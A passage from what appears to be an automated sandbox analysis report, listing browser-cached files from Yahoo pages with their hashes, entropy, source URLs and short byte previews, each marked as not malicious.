                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....0p..k...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY.t...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 13:38:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                  Entropy (8bit):3.989543554027737
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:258E5D584D4FD963A1B9CBF233C6D71F
                                                                                                                                                                                                                  SHA1:25A31C10BAFDE99A57F4D6F41651635BAEB4640E
                                                                                                                                                                                                                  SHA-256:5D82390A95AA29CD5F265AAADA1D2AF191541AAE06889723E8C09AF147048C1F
                                                                                                                                                                                                                  SHA-512:52A2918EE6C53EEAD37836598DE2DF9F502A0F866F559539EA6E6380E71BA454BF72C040D255C3C0911D63D31B3C02E8F3CCE43F1B09F19C67865C929810E98D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......o.k...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY.t...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):21
                                                                                                                                                                                                                  Entropy (8bit):3.403989446485262
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:031A8B6F8BAEA1DF8DA69CAFED49D579
                                                                                                                                                                                                                  SHA1:BA6C224B8AC88AD4368A30775BBD4CBAD9BE3BA5
                                                                                                                                                                                                                  SHA-256:E5C0644466F49DFB193A225E813EB639BD14B0933EAA4CF457688BA716D49D95
                                                                                                                                                                                                                  SHA-512:5B70D7F4F7B5A20657E835AEC1698BE17949EBA4E9B68E4DADD13B5BE9328A602CA815C9AD9CC6205F291199E18E7237CB4512CC840904F65AC4162F388B5801
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://www.yahoo.com/tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=ppRQKR/DLbp
                                                                                                                                                                                                                  Preview:{"data":[],"meta":{}}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4816)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):176350
                                                                                                                                                                                                                  Entropy (8bit):5.436374987612764
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D5ED48CD9842C8EA9F1730D49D56BDFB
                                                                                                                                                                                                                  SHA1:C01CBAEEF4E8AC230443F5B8FF99DABA39623FA9
                                                                                                                                                                                                                  SHA-256:4C0FA58A4727E0FBA223F84F72B98CD43D9E8FEF5F8800034031AD8DB95316C1
                                                                                                                                                                                                                  SHA-512:1EF10043BD2CB365830C0D7F28AC0DA6D86B97838AA3CA730100A291A8417DBD3D8663AB7A29188A2EA87F6F2B2705D58D5F988EFDFD20041A9BAC93D42833F4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.ug=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.ug};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                  SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                  SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                  SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (62403)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):77851
                                                                                                                                                                                                                  Entropy (8bit):5.422328020643102
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:60F19CA2F094ACABBA5B7988467387C4
                                                                                                                                                                                                                  SHA1:C7EA2FA0D8DA961083A322D72DEE176A45DF9232
                                                                                                                                                                                                                  SHA-256:FD9784852FBB3FE6285225683513C82D88F104AF9B05AE0B7C5E973F33A0BBA1
                                                                                                                                                                                                                  SHA-512:FD06B5BA1C97017C7833C7011202DC51821705ED85ACBE03F5AC3E4B01AA39F2D1F3F3CDF4EDBF50D48A5788FEB61DF0782181948F44F44614EC2A23327CE0CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uc/sf/0.1.434/js/safe.min.js
                                                                                                                                                                                                                  Preview:/*! SAFEFRAME 0.1.434 . 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l-9.9 9.9-9.898-9.9c-.78-.78-2.048-.78-2.828 0-.78.78-.78 2.047 0 2.828l9.9 9.9-9.9 9.898c-.78.78-.78 2.047 0 2.828.78.78 2.047.78 2.828 0l9.9-9.9 9.898 9.9c.78.78 2.048.78 2.828 0 .782-.78.782-2.047 0-2.827z"},t.exports&&(t.exports=e.close)},4228:function(t){var e;(e=void 0===e?{}:e)["decline-fill"]={name:"decline-fill",height:48,width:48,path:"M24 1C11.3 1 1 11.3 1 24s10.3 23 23 23 23-10.3 23-23S36.7 1 24 1zm9.8 32.8c-.9.9-2.2.9-3.1 0L24 27l-6.8 6.8c-.9.9-2.2.9-3.1 0s-.9-2.2 0-3.1l6.8-6.8-6.7-6.7c-.9-.9-.9-2.2 0-3.1.9-.9 2.2-.9 3.1 0l6.7 6.7 6.7-6.7c.9-.9 2.2-.9 3.1 0 .9.9.9 2.2 0 3.1l-6.7 6.7 6.7 6.8c.9.9.9 2.3 0 3.1z"},t.exports&&(t.exports=e["decline-fill"])},8586:function(t,e,n){"use strict";var r,o=n(7427),i=n(3215),s=n(3945);fun
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                                                                  Entropy (8bit):5.42109803389241
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AF222F780E0378D1C52C1D99908E978B
                                                                                                                                                                                                                  SHA1:AD3E7E216DF9CC438B09738F4C025A2DF65E6F4D
                                                                                                                                                                                                                  SHA-256:38EF5A1088AADC48A335F21855246B384C52E693F51D4B82B045D49216580D7D
                                                                                                                                                                                                                  SHA-512:4FE7B235AE4329274C2F524135DF3E46E2278BA726404A7745002741853235395D2283430BA97CA22F4977926743203AFECC74E2B221FF1F5F0D19B54FF7ECB2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://gpt.mail.yahoo.net/sandbox?client=login&version=0.1&limited=0&headerBidder=1&haq=1&benji=1
                                                                                                                                                                                                                  Preview:.<!doctype html>.<html>.<head>. .<link rel="dns-prefetch" href="//securepubads.g.doubleclick.net">.<link rel="preconnect" href="//securepubads.g.doubleclick.net">..<link rel="dns-prefetch" href="//pagead2.googlesyndication.com">.<link rel="preconnect" href="//pagead2.googlesyndication.com">..<script nonce="LCes45QL92KKduk4w6oILg==">. window.ymailAssetHost="https://s.yimg.com/nq/nr/";. window.ymailNonce="LCes45QL92KKduk4w6oILg==";.</script>.<script nonce="LCes45QL92KKduk4w6oILg==" src="https://s.yimg.com/nq/nr/taboolajs/taboola/cmp_utils_1.3.js"></script>.<script nonce="LCes45QL92KKduk4w6oILg==" src="https://s.yimg.com/aaq/benji/benji-2.1.122.js"></script>.<script nonce="LCes45QL92KKduk4w6oILg==" defer src="https://s.yimg.com/nq/nr/js/gpt_sandbox_9a9bc369b314037c4116.bundle.js"></script>.<style>. html,body{margin:0;padding:0;width:100%;height:100%;display:flex;flex-direction:column;}. #Slot300_250_2-collapse {margin: 0}. #Slot300_250_2. {margin-top: 18px}. {margin:-8px 0 0 -4p
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5636), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5636
                                                                                                                                                                                                                  Entropy (8bit):5.265735267819504
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:0CCB51BC1DD6980920DA39E008A599E0
                                                                                                                                                                                                                  SHA1:929B21AC5A628A05E9F87A8E734954D90F1EE093
                                                                                                                                                                                                                  SHA-256:B168BE397AC36DBCA02B07547DAD2A928427E765DF9B49A931F05DB057F3A83C
                                                                                                                                                                                                                  SHA-512:665527069009017AB5B2ACAB0EE764052C84672451CCE9189961420E38239C3C63852D60366952BDFF92DECB3610BD8ABE6BDD44A5B8F89CF51CEF04445F2267
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://edge-mcdn.secure.yahoo.com/ybar/cerebro_min.js
                                                                                                                                                                                                                  Preview:var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeacon=function(){this.runExperiment()},e.prototype._extractResourceTiming=function(n){var t="",t="[";return["startTime","redirectStart","redirectEnd","fetchStart","domainLookupStart","domainLookupEnd","connectStart","secureConnectionStart","connectEnd","requestStart","responseStart","responseEnd"].forEach(function(e){t+=n[e]+","}),t=t.slice(0,-1)+"]"},e.prototype._extractHeader=function(n,e){if(0==e.length)return"{}";var t="{";return e.forEach(function(e){t+='"'+e+'":"'+n.getResponseHeader(e)+'",'}),t=t.slice(0,-1)+"}"},e.prototype._fetchWork=function(){var n=this,r=!1;new Promise(function(n,t){var o=setTimeout(function(){r=!0,t(new Error("Work Order Request Timed Out"))},TIMEOUT);fetch(WORK_SERVER).then(function(e){clearTimeout(o),r||n(e)
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):6296
                                                                                                                                                                                                                  Entropy (8bit):7.935346103273621
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6E6C84CA098F552E194EF3AC48D4F353
                                                                                                                                                                                                                  SHA1:17F73B2AAE864A6C0C283FEEBA86D316BAAE3FFC
                                                                                                                                                                                                                  SHA-256:208FE825A76A24DC9E6466A17C070B0744B5C8CB4D711E3EB25C5B433FC44E01
                                                                                                                                                                                                                  SHA-512:C2F79C3B9D2351C08AE2CFA727E1B5F6B9875227CF68A57AD6A1289CEF89B2D57755C71D41FBFB5500248952E8C0736935E724A391DA966733F3830FD5440B4B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:"https://images.taboola.com/taboola/image/fetch/h_179%2Cw_340%2Cc_pad,b_white/http%3A//cdn.taboola.com/libtrc/static/thumbnails/95722a52ac57edc8a6b5e0fdea0dd105.png"
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X........S.....VP8 .........*T...>.@.I...$'..`..M...@..T. .P.W...@.Om..=.?.q..ww....c.._.jRJ............@....r....=$..s."....<....X.-^....v...}...g&.|...l-.ga.7.J.#..09gc..._.[..y4Q7+0..^&....|]t.A...-.5..K'..H.[.p.Ci..U,E.c.0.*....c..N.v..H~0P...5....c#...@..H./..m=.v..wo-...b.?.c..yK..K.2l/wL...~>8+.=..."a....e.j.....P.v.%.fm.?..h....Xk..z...'...Z.s..@.=.E..`....._.8.-..=Z.d..Kd&zS..i>oO....l.CG".v...C..4.vs..<{...7O..f..z.....A....x....<.?B...`.....(.-B..D.......].....m........b1....'5..s..fZ[....NG..........4f.y..a5.<.....VD....9.b.9d..-.*.....`.j....l!..*O..]0.r..S...J.F.lEY........OQ.H....x..n.z......6..[..~B...1...*...-+\..{7......9fF...q...N.kg..u.....B(......V...Y..@..B.."..x...G.F..W.O.w..`~.D..]..KW..o/.....x..n.Z.Y..hl.u>..C..<~....D~.j..P.rK..4...^./)..^PVi...ZnD .L.I-Sgy&. ...%n...\..).....Di.....O.,.._.o...%.....b..n.g..x..s.....)..~H..]c].............]......M..T..".L.\x&EyH._?......m......M...:...@....w........
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                                                  Entropy (8bit):4.883264074811945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C8ABBBB3719D684E82979C9F075C9F8F
                                                                                                                                                                                                                  SHA1:9892AE23185F9F9040C0491453F98868383A5E00
                                                                                                                                                                                                                  SHA-256:4B6D29B9F8293760509C819B72D8A33DF2366E2FEFBDB56AF1E1F63004FDC1B3
                                                                                                                                                                                                                  SHA-512:21ADEEE9BEFBE86D7898442EB8E57424397ED3CE3E905F32922CF24486851ABD56BF6F0CA363DEFC44A12E904382FF5727BA621A2305161D2A2A747602C6C329
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.9375db7a6e23b64c7c951fb6a154abc0.min.css","name":"react-wafer-shopping.ShoppingContent.atomic"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css","name":"react-wafer-shopping.custom.desktop"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-toggle-1.15.4-modern.js","name":"wafer-toggle","version":"1.15.4"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"},{"location":"bottom","value":"/aaq/wf/wf-caas-1.36.6-modern.js","name":"wafer-caas","version":"1.36.6"},{"location":"bottom","value":"/aaq/wf/wf-image-1.4.0-modern.js","name":"wafer-image","version":"1.4.0"
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13778), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13778
                                                                                                                                                                                                                  Entropy (8bit):5.2842901333678345
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:4443A60B3D3645610C9E65B7CC9F15BB
                                                                                                                                                                                                                  SHA1:DE3A0B8509362B37FB40D74A9883F366D161A8B5
                                                                                                                                                                                                                  SHA-256:F271BF73D0EEFE04F56CB6390E07D7D2A4794787283D65221397B258CEF040DF
                                                                                                                                                                                                                  SHA-512:6134E0CE99CC2128F03FF38713B7A88617EA9C1518F01C6D56CD725673C0F58B58572E4744C6254868D98BE8EF9AF352BA0B724290EB35D182AA5F57381048B0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-action"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(a){if(r[a])return r[a].exports;var i=r[a]={i:a,l:!1,exports:{}};return t[a].call(i.exports,i,i.exports,e),i.l=!0,i.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,a){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:a})},e.n=function(t){var r=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(r,"a",r),r},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,r){"use strict";function a(t,e,r){return e in t?Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,w
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):152558
                                                                                                                                                                                                                  Entropy (8bit):5.732116686540624
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B2C2AC9006796E2D244D990EEC5C1053
                                                                                                                                                                                                                  SHA1:618C50B474F6D7387697C965FD8B97114605C793
                                                                                                                                                                                                                  SHA-256:CC060F127A981930140ECCAC2677DC4D7B4EBA1BC0D911CCD1E93AEEEEFBDCF6
                                                                                                                                                                                                                  SHA-512:BBC76FA3AECABD1A3D3AF05B53CD75B2D47638C2FB0C790EE465016813D3BB52CCF9F982EC1D190E469F9C917ED71C4B94D8C5F70E11BDF19AD833AC5E9B251D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/f10d509c/d1ccw66oyq8ex2.js
                                                                                                                                                                                                                  Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):50120
                                                                                                                                                                                                                  Entropy (8bit):7.950361363334854
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:36D7D9FC3A7A738E01B53C359E4DA6C7
                                                                                                                                                                                                                  SHA1:F5058F65435E25E28C2D53687E3588B7634B5336
                                                                                                                                                                                                                  SHA-256:927D4EC4AC6538B1827FE4A34901EBDCA776022ADA99061DE6C229045B32AD84
                                                                                                                                                                                                                  SHA-512:D933F6D60FAFBB0766A7B519B362B9371A767694D12E768B30A393EFEFE03FE98B3293DDFF78DA117A12EC24BDDB9077D41D165E529E7E6C53A28843087F74A2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF............. ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg... ... vcgt...@...0ndin...p...>mmod.......(vcgp.......8bTRC........gTRC........aabg... ... aagg... ... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........C.o.l.o.r. .L.C.D..text....Copyright Apple Inc., 2024
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):146837
                                                                                                                                                                                                                  Entropy (8bit):5.7639341092414895
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9FF298BE2661094AC712AB029D95ED90
                                                                                                                                                                                                                  SHA1:168ACEF30D182AC6DB106C6BEC7649D275950269
                                                                                                                                                                                                                  SHA-256:9DC079C7224E9EDDB0C279406FD8A3D73CA6CAC7B84097E6F12E4CB4E10B5566
                                                                                                                                                                                                                  SHA-512:BF6B288EACE62F94CF9559DD2C931619B00D6E82A678FEE9539771EA9B1DB566A8E0960CF5DE61096D4480D1DB5DD9FB386A32B9943DDB3043EFF4E2A13D5CC6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(new function(){var c=['DxjSidOG','z2v0t3DUuhjVCgvYDhLoyw1LCW==','CMvZAwr1ywXive1m','Aw5qBgfJzw1LBNq=','zM9JDxm=','C2XPy2u=','vw5LEhbLy3rLzcbJB2rLCIbZzxr1CcbMywLSDxjLoGO=','CMv0DxjUihDPBMrVDY4=','Bwv0yvTODhrWlwvXDwL2psjdB250zw50lvnLy3vYAxr5lvbVBgLJEsjD','zg9JDw1LBNrfBgvTzw50','kgmPienSzwfUlMLVieLUyY4SidiWmJiUiefSBcbsAwDODhmGuMvZzxj2zwq=','B250B3vJAhn0yxj0','C2vZC2LVBKLK','yxbPqxv0B3bSyxK=','Aw5Zzxj0qwrQywnLBNrfBgvTzw50','zgvMAw5LuhjVCgvYDgLLCW==','BM9Kzvr5Cgu=','ufDsmG==','y2XPy2S=','w0vsuL9dxq==','ic8Grevwmu9h','zw50CMLLCW==','phjJDd50Ehq9','cIaGicbHDcbHyM91DdPIBgfUAZO=','Aw50zxj2zw50Aw9U','zxz0lw5HDG==','ugfNzq==','yxjYyxLcDwzMzxi=','AwzYyw1LoIa=','Aw5Uzxjive1m','CMv3CML0zq==','ic8GC3rHy2S=','yMLKuMvZCg9UC2u=','w0vFwfrFtL0=','AgfZAa==','zgf0ys13AwrNzxqTAwq=','phrIBd51CMW9','B3bHy2L0Eq==','y3jLyxrLvhjLzvDHBgTLCG==','DhjHy2vK','qxr0zw1WDgvKihrVDgfSigXVzYbZAxPLoIa=','cMDSB2jHBcbJB2rLqgfIB3v0oMjSyw5RoG==','w0vsuL9gxq==','z2v0rxzLBNrZ','Dg9W','zM9YBvn1yM1PDa==','rK9stq==','Ahr0CevXDwL2','
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5056
                                                                                                                                                                                                                  Entropy (8bit):7.760216153214206
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:909BD7CADF78BAA4F60015A7110C2B79
                                                                                                                                                                                                                  SHA1:0FBB602A574BAB0F16900BF0DB830CB8120749E0
                                                                                                                                                                                                                  SHA-256:200A7F46E0AA0515F8F5E6A87A1BFFD8241E8065B08959E21F725C3D412EA412
